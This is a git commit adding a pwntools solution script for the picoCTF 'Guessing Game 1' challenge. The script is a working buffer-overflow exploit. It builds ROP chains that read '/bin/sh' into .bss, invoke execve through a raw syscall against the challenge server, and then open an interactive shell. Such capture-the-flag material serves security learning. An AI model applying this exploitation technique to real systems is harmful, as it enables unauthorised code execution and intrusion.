Guessing Game 1

2025-12-21 19:35:24 +01:00
parent e2706a9bc4
commit e23720a073
6 changed files with 218 additions and 0 deletions
--- a/guessing_game_1/sol.py
+++ b/guessing_game_1/sol.py
@@ -0,0 +1,58 @@
+#!/usr/bin/env python
+from pwn import *
+# https://cyb3rwhitesnake.medium.com/picoctf-guessing-game-1-pwn-bdc1c87016f9
+context.terminal = "kitty"
+
+numbers = [84, 87, 78, 16, 94, 36] # -> brute-forcing script
+
+elf = ELF("./vuln")
+rop = ROP(elf)
+pop_rdi = rop.rdi.address
+pop_rsi = rop.rsi.address
+pop_rdx = rop.rdx.address
+pop_rax = rop.rax.address
+syscall = rop.syscall.address
+bss = elf.bss()
+read = elf.functions['read'].address
+main = elf.functions['main'].address
+
+ret_offset = 120
+
+conn = remote("shape-facility.picoctf.net", 50780)
+#conn = process("./vuln")
+#attach(conn)
+
+conn.recvuntil(b"guess?")
+conn.sendline(str(numbers[0]).encode())
+conn.recvuntil(b"Name?")
+
+# call read: read(int fd -> rdi, void buf[count] -> rsi, size_t count -> rdx)
+# read(stdin/0, bss, 12)
+log.info(f"sending read payload")
+payload = cyclic(ret_offset, n=8)
+payload += p64(pop_rdi) + p64(0)
+payload += p64(pop_rsi) + p64(bss)
+payload += p64(pop_rdx) + p64(12)
+payload += p64(read)
+payload += p64(main)
+conn.sendline(payload)
+conn.sendline(b"/bin/sh\x00")
+
+conn.recvuntil(b"guess?")
+conn.sendline(str(numbers[1]).encode())
+conn.recvuntil(b"Name?")
+
+# call /bin/sh: sys_execve(59), rdi: char *filename, rsi: char *argv, rdx: char *envp
+# sys_execve(bss, NULL/0, NULL/0)
+log.info(f"calling execve")
+payload = cyclic(ret_offset, n=8)
+payload += p64(pop_rax) + p64(59)
+payload += p64(pop_rdi) + p64(bss)
+payload += p64(pop_rsi) + p64(0)
+payload += p64(pop_rdx) + p64(0)
+payload += p64(syscall)
+conn.sendline(payload)
+
+conn.recvline()
+conn.interactive()
+